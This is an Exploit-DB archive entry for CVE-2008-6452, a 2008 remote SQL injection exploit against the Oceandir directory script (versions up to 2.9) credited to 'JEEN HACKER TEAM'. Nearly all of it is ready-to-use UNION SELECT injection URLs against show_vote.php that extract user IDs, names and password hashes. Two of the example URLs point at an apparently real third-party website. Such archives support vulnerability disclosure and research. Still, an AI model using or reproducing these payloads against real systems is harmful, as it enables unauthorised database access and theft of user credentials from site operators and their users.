- 18 Dec 2022
- EDB-ID: 6504
- EDB verification: Passed
- Author: JEEN HACKER TEAM
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: CVE-2008-6452
- Publication date: 2008-09-20
Code:
/**
* @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection
* @author JEEN HACKER TEAM [ Jeen + Secertry ]
* @cost 250$
* @script http://www.oceandir.com
* @copyright 2008
* @homepage http://www.hackteach.org/cc/teach.php
* @email [email protected] , [email protected]
*/
Exploit :
~user
http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
~passwd
http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
Example :
####
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
####
Greetz : www.hackteach.org user's
# milw0rm.com [2008-09-20]
- Source: www.exploit-db.com